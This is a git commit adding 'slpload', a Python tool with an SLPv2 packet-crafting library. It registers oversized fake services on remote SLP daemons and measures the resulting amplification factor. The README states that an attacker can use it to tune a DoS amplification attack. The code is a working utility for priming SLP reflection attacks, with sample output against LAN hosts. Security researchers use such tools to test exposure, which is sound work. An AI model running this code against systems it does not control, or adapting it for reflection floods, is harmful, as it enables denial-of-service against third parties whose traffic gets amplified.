Initial commit

This commit is contained in:
dash
2026-01-23 20:47:53 +01:00
commit 1d05fd4bd2
4 changed files with 543 additions and 0 deletions

52
README.md Normal file
View File

@@ -0,0 +1,52 @@
# SLPLOAD
Testtool for amplification factor of slpd daemon.
## Usage
### Show all modes
With the -m? option you can list all supported modes.
```
./slpload.py -m?
Supported modes:
one-shot - load one-time data into svc
load-test - try to load as much data as possible to service and calc ampfactor
check - check data in default registry
```
### Test the maximum size of remote slpd buffer
Load test until remote buffer is filled. The command sets the buffer fillup to 1250bytes, registered lifetime to 10000 seconds and a timeout of 2s.
./slpload.py -T 10000 -s 1250 -t 2 -l 192.168.0.109 -m load-test
### Send one fillup request only, 512 bytes payload, 1 second timeout and 60 seconds registered lifetime
```
./slpload.py -T 60 -s 512 -t 1 -l 192.168.0.110 -m one-shot
[+] Preparing packet
[+] Sending packet Register V2...
[+] Registration accepted.
[+] Loaded up with 579 bytes
```
### Check remote registered data
```
./slpload.py -l 192.168.0.110 -m check
[+] Sending service type request v2...
[+] Data Buffer:
b'\x02\n\x00\x02C\x00\x00\x00\x00\x00\x83\xf8\x00\x02en\x00\x00\x02/service:VMwareInfrastructure,service:wbem:https,slpLoadTest://alF4yQIL:31337/Y40iEypDw8zSKwZPg3tuyrjnpLrGkuYH1GQyDuQgQC4EEAYE8Nf5hKVufZkboVoxLZNxhPYUH4WAqbfqQyGpg4jVSfUR6HX3utbdZ7Vvhi5qs9fW7NyjrQqTZxjNK8pHY40iEypDw8zSKwZPg3tuyrjnpLrGkuYH1GQyDuQgQC4EEAYE8Nf5hKVufZkboVoxLZNxhPYUH4WAqbfqQyGpg4jVSfUR6HX3utbdZ7Vvhi5qs9fW7NyjrQqTZxjNK8pHY40iEypDw8zSKwZPg3tuyrjnpLrGkuYH1GQyDuQgQC4EEAYE8Nf5hKVufZkboVoxLZNxhPYUH4WAqbfqQyGpg4jVSfUR6HX3utbdZ7Vvhi5qs9fW7NyjrQqTZxjNK8pHY40iEypDw8zSKwZPg3tuyrjnpLrGkuYH1GQyDuQgQC4EEAYE8Nf5hKVufZkboVoxLZNxhPYUH4WAqbfqQyGpg4jVSfUR6HX3ut'
[!] Host: 192.168.0.110 Buffer Size: 579 Ampfactor: 19.96551724137931
```
## Outro
On some devices / SLP implementations, the daemon stops filling the buffer after a certain point and either maintains the size or reverts to some default value.
For a DoS amplification attack and in order to optimize the amplification to the maximum an attacker just has to adjust the payload size for the device he is populating.
May the packets be with you.
# Author
Marco Lux

Binary file not shown.

161
libs/srvloc_proto_v2.py Normal file
View File

@@ -0,0 +1,161 @@
import struct
import random
SLP_SVC_REQ = 0x1
SLP_SVC_REG = 0x3
SLP_SVC_DEREG = 0x4
SLP_ATTR_REQ = 0x6
SLP_SVC_TYPE_REQ = 0x9
SLP_TRANSX_RAND = True
SLP_XID_RAND = True
CRAFT_AUTO_LEN = True
DEBUG_PROTO = True
#####################
###### SLP v2 #######
#####################
def build_slp_base_v2(slp_ver=2, slp_func=0, slp_pkt_len=0, slp_flags=0, slp_next_offset=0, slp_xid=0x299, slp_ltag_len=2, slp_ltag=0x656e):
if SLP_XID_RAND:
slp_xid = random.randint(1, 65535)
# basic pkt structure v2
pkt = struct.pack('>BBBHHBHHHH', slp_ver, slp_func, 0, slp_pkt_len,
slp_flags, 0, slp_next_offset, slp_xid, slp_ltag_len, slp_ltag)
return pkt
def compute_len_v2(pkt):
pkt_len = len(pkt)
pkt_byte_len = struct.pack('>bH', 0, pkt_len)
pkt = pkt[:2] + pkt_byte_len + pkt[5:]
return pkt
#########SLP_SVC_REQ = 0x1
def build_slp_svc_req_v2(svc_type_op):
pkt1 = build_slp_base_v2(slp_func=svc_type_op)
#pkt1 = build_slp_base_v2(slp_func=SLP_SVC_REQ)
pkt2 = _slp_svc_req_v2()
pkt = pkt1+pkt2
pkt_rdy = compute_len_v2(pkt)
return pkt_rdy
def _slp_svc_req_v2(slp_prev_res_list=0, slp_svc_type_len=0, slp_svc_type=b'service:wbem', slp_scope_len=7, slp_scope=b'default'):
'''
'''
pkt2 = struct.pack('>HH'+str(slp_svc_type_len)+'sH'+str(slp_scope_len)+'sHH', slp_prev_res_list,
slp_svc_type_len, slp_svc_type, slp_scope_len, slp_scope, 0, 0)
return pkt2
##########
##### SLP_SVC_REG = 0x3
def build_slp_svc_reg_v2():
pkt1 = build_slp_base_v2(slp_func=SLP_SVC_REG)
pkt2 = _slp_svc_reg_v2()
pkt = pkt1+pkt2
pkt_rdy = compute_len_v2(pkt)
return pkt_rdy
def _slp_svc_reg_v2(slp_reserved=0, svc_url_lifetime=666, svc_url_len=19, svc_url=b'slpTest://test:31337/a', slp_num_auth=0, svc_type_len=38,
svc_type=b'slpTest://test:31337/aaaaaaaaaaaaaaaaaaaa', scope_list_len=7, scope_list=b'default', attr_list_len=0, attr_auths=0):
'''
'''
pkt2 = struct.pack('>BHH' + str(svc_url_len) + 'sBH' + str(svc_type_len) +
'sH'+str(scope_list_len)+'sHB', slp_reserved,
svc_url_lifetime,
svc_url_len,
svc_url,
slp_num_auth,
svc_type_len,
svc_type,
scope_list_len,
scope_list,
attr_list_len,
attr_auths)
return pkt2
###################
#######SLP_SVC_DEREG = 0x4
def build_slp_svc_dereg_v2():
pkt1 = build_slp_base_v2(slp_func=SLP_SVC_DEREG)
pkt2 = _slp_svc_dereg_v2()
pkt = pkt1+pkt2
pkt_rdy = compute_len_v2(pkt)
return pkt_rdy
def _slp_svc_dereg_v2(scope_list_len=7, scope_list=b'default', reserved=0, attr_list_len=0, svc_url_lifetime=666, svc_url_len=19, svc_url=b'slpTest://test:31337/a',
attr_auths=0):
'''
'''
pkt2 = struct.pack('>H'+str(scope_list_len)+'sBHH'+str(svc_url_len)+'sHB',
scope_list_len,
scope_list,
reserved,
svc_url_lifetime,
svc_url_len,
svc_url,
attr_list_len,
attr_auths)
return pkt2
######SLP_ATTR_REQ = 0x6
def build_slp_attr_req_v2():
pkt1 = build_slp_base_v2(slp_func=SLP_ATTR_REQ)
pkt2 = _slp_attr_req_v2()
pkt = pkt1+pkt2
pkt_rdy = compute_len_v2(pkt)
return pkt_rdy
def _slp_attr_req_v2(slp_prev_res_list=0, slp_svc_url_len=12, slp_svc_url=b'service:wbem', slp_scope_len=0, slp_scope=b'', slp_tag_len=0, slp_tag=b''):
pkt2 = struct.pack('>HH'+str(slp_svc_url_len)+'sH'+str(slp_scope_len)+'sH'+str(slp_tag_len)+'sH', slp_prev_res_list,
slp_svc_url_len, slp_svc_url, slp_scope_len, slp_scope, slp_tag_len, slp_tag, 0)
return pkt2
#######################
#####SLP_SVC_TYPE_REQ = 0x9
def build_slp_svc_type_req_v2():
pkt1 = build_slp_base_v2(slp_func=SLP_SVC_TYPE_REQ)
pkt2 = _slp_svc_type_req_v2()
pkt = pkt1+pkt2
pkt_rdy = compute_len_v2(pkt)
return pkt_rdy
def _slp_svc_type_req_v2(slp_prev_res_list=0, slp_all=65535, slp_scope=b'default', slp_scope_len=7):
pkt2 = struct.pack('>HHH'+str(slp_scope_len)+'s', slp_prev_res_list,
slp_all, slp_scope_len, slp_scope)
return pkt2
########################

330
slpload.py Executable file
View File

@@ -0,0 +1,330 @@
#!/usr/bin/env python3
import sys
import math
import socket
import string
import random
import argparse
from libs.srvloc_proto_v2 import build_slp_svc_type_req_v2, build_slp_svc_req_v2, _slp_svc_reg_v2, _slp_svc_req_v2, \
_slp_svc_type_req_v2, _slp_svc_dereg_v2, build_slp_base_v2, SLP_SVC_DEREG, SLP_SVC_REG, compute_len_v2, SLP_SVC_REQ, \
SLP_SVC_REG,SLP_SVC_DEREG
__tool_name__ = 'slpload'
__tool_version__ = '0.4b'
__tool_author__ = 'Marco Lux (ping@curesec.com)'
__tool_date__ = 'April 2023'
def build_socket(args):
ipv6 = args.ipv6
host = args.host
port = args.port
timeout = args.timeout
try:
# enable ipv6
if ipv6:
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# this keeps the same
sock.settimeout(timeout)
sock.connect((host, port))
except Exception as e:
print(repr(e))
sys.exit(-1)
return sock
def build_slp_svc_reg_v2(pkt2):
pkt1 = build_slp_base_v2(slp_func=SLP_SVC_REG)
pkt = pkt1+pkt2
pkt_rdy = compute_len_v2(pkt)
return pkt_rdy
def setup_reg_pkt(words, words_rand, rand_len, lifetime):
svc_word = 'slpLoadTest'
# there must not be a carriage return
svc_word_dom = words[::-1].rstrip('\r\n')
svc_ports = 31337
# multiply the words_rand until we have the wanted size for the buffer
#print(len((words_rand)) / rand_len)
fin_size = (rand_len / int(len(words_rand)))+1
# this is really *not* how it should be done
# but i'am a bit tired
svc_alpha_rand = words_rand
for f in range(0, int(fin_size)):
svc_alpha_rand = "{0}{1}".format(svc_alpha_rand,svc_alpha_rand)
svc_alpha_rand = svc_alpha_rand[:rand_len]
# setup the service url
svc_url = '{0}://{1}:{2}/'.format(svc_word,svc_word_dom, svc_ports)
# get the length, we need that for later substraction
svc_url_len = len(svc_url)
# lets substract the service name, slasshes etc. from the overall
# length, to get a precise buffer
svc_alpha_rand = svc_alpha_rand[:len(svc_alpha_rand)-svc_url_len-1]
# setup the service type
svc_type = '{0}://{1}:{2}/{3}'.format(svc_word,
svc_word_dom, svc_ports, svc_alpha_rand)
# encode the data, so it can be used with sockets
svc_url = svc_url.encode()
def_svc_type = svc_type.encode()
def_svc_len = len(def_svc_type)
# setup the registration packet
pkt_regis = _slp_svc_reg_v2(slp_reserved=0,
svc_url_lifetime=lifetime,
svc_url_len=svc_url_len,
svc_url=svc_url,
slp_num_auth=0,
svc_type_len=def_svc_len,
svc_type=def_svc_type,
scope_list_len=7,
scope_list=b'default',
attr_list_len=0,
attr_auths=0)
# build and return
pkt = build_slp_svc_reg_v2(pkt_regis)
return pkt
def gen_random_string(stringLength=8):
'''
'''
"""Generate a random string of fixed length """
lettersAndDigits = string.ascii_letters + string.digits
return ''.join(random.choice(lettersAndDigits) for i in range(stringLength))
def check_mode(args):
'''
request which services are available
'''
# socket timeout
#timeout = args.timeout
# setup and build socket
sock = build_socket(args)
# setup packet
pkt = build_slp_svc_type_req_v2()
# send packet
print('[+] Sending service type request v2...')
sock.send(pkt)
# non parsed response
data = sock.recv(65535)
pkt_len = len(data)
# assumption is our svc type req pkt is 29 bytes
req_len = 29
amp_fact = pkt_len / req_len
print('[+] Data Buffer: {0}'.format(repr(data)))
print(f'[!] Host: {args.host} Buffer Size: {pkt_len} Ampfactor: {amp_fact}')
return True
def load_mode(args):
data_dict = {}
recv_size = 65535
pkt_size = args.size
lifetime = args.lifetime
#f_path = args.supply_dir
# lets get some random data
words = gen_random_string()
words_rand = gen_random_string(128)
# build a socket dgram
sock = build_socket(args)
# make register packet basics
print('[+] Preparing packet')
pkt = setup_reg_pkt(words, words_rand, pkt_size, lifetime)
print('[+] Sending packet Register V2...')
sock.send(pkt)
try:
ret = sock.recv(1024)
except TimeoutError as e:
print('[-] Packet too big? ', e)
data_dict = {'error':'timeout'}
return False, data_dict
except Exception as e:
#print(e)
data_dict = {'error':repr(e)}
return False, data_dict
# output
#print(repr(ret))
if ret:
# check if svc 2 and reply
if ret[0:2] == b'\x02\x05':
print('[+] Registration accepted. ')
else:
print('[-] Uncommon response. Abort.')
#sys.exit(-1)
return False,data_dict
else:
print('[-] Loading up failed. Abort.')
return False, data_dict
pkt = build_slp_svc_type_req_v2()
sock.send(pkt)
pkt_len = 0
new_data = b''
while True:
try:
recv_data = sock.recv(recv_size)
pkt_len = (len(recv_data)) + pkt_len
new_data = recv_data + new_data
data_dict = {'data':new_data,'pkt_len':pkt_len}
except Exception as e:
data_dict = {'data':new_data,'pkt_len':pkt_len}
#print(repr(e))
break
print(f'[+] Loaded up with {pkt_len} bytes')
#print(repr(f'{new_data}'))
sock.close()
return True, data_dict
def load_loop(args):
'''
method tests to what size a remote target is capable of taking in data
'''
old_val = -1
while [ 1 ]:
ret, res_dict = load_mode(args)
if not ret:
err = res_dict['error']
# maybe packet was too big lets size it down
if err == 'timeout':
args.size = math.ceil(args.size * 0.9)
print(f'New packet size {args.size}')
else:
# take remote buffer size
pkt_len = (res_dict['pkt_len'])
# assumption is our svc type req pkt is 29 bytes
req_len = 29
amp_fact = pkt_len / req_len
print(f'[!] Host: {args.host} Buffer Size: {pkt_len} New Pkt Size: {args.size} Ampfactor: {amp_fact}')
if pkt_len == old_val:
print(f'[!] Attention Buffser Size *NOT* changed. Now: {pkt_len} Old: {old_val}')
print('[!] This indicates overrun at SLPD side.')
old_val = pkt_len
return True
def run(args):
mode = args.mode
# control structure aka what shall i do?
if mode == 'one-shot':
load_mode(args)
# elif mode == 'de-reg':
# dereg_mode(args)
elif mode == 'check':
check_mode(args)
elif mode == "load-test":
load_loop(args)
else:
print('[-] Unknown mode. Exit.')
sys.exit(-1)
def main():
parser_desc = "%s %s %s in %s" % (
__tool_name__, __tool_version__, __tool_author__, __tool_date__)
parser = argparse.ArgumentParser(prog=__tool_name__, description=parser_desc)
parser.add_argument('-6', '--ipv6', action='store_true', dest='ipv6', required=False,
help="enable ipv6 addresses")
parser.add_argument('-l', '--host', action='store', dest='host', required=False,
help="host to connect to", default='localhost')
parser.add_argument('-p', '--port', action='store', type=int, dest='port', required=False,
help="port to use to connect to", default=427)
parser.add_argument('-s', '--size', action='store',type=int, dest='size', required=False,
help="size of data to store", default=512)
parser.add_argument('-t', '--timeout', action='store',type=int, dest='timeout', required=False,
help="socket connection timeout", default=5)
parser.add_argument('-T', '--lifetime', action='store',type=int, dest='lifetime', required=False,
help="lifetime of data registered as service", default=100)
parser.add_argument('-m', '--mode', action='store', dest='mode', required=False,
help="choose the mode to use for slpload, for supported modes enter use as arg for -m?", default='one-shot')
parser.add_argument('-r', '--register-svc', action='store', dest='reg_svc', required=False,
help="complete data string with content for service registration", default='test')
if len(sys.argv) < 2:
parser.print_help(sys.stderr)
usage()
sys.exit()
args = parser.parse_args()
if args.mode == '?':
print('Supported modes:\n')
print('\tone-shot - load one-time data into svc')
print('\tload-test - try to load as much data as possible to service and calc ampfactor')
print('\tcheck - check data in default registry')
print()
sys.exit(-1)
run(args)
def usage():
helpme = '''
Single load packet stored at remote slpd:
python slpload.py -t 2 -l <ip> -m one-shot
Loop and try to load up the remote slpd until its filled. Use option -m "load-test":
python slpload.py -t 2 -l <ip> -m load-test -s 1200 -T 1000
Check data stored at remote site, print data and size plus amplification factor:
python slpload.py -t 2 -l <ip> -m check
IPV6 Support: Can you enabled by -6
./slpload.py -6 -l <ipv6>
NOTE: -s Minimum size is 30 bytes, otherwise calculation gets incorrect. This is related to the
svc url / svc type fields necessary for registration. Also try to have size ~100 bytes less than
the MTU to avoid fragmentation. A safe maximum value is ~1300.
'''
print(helpme)
if __name__ == "__main__":
main()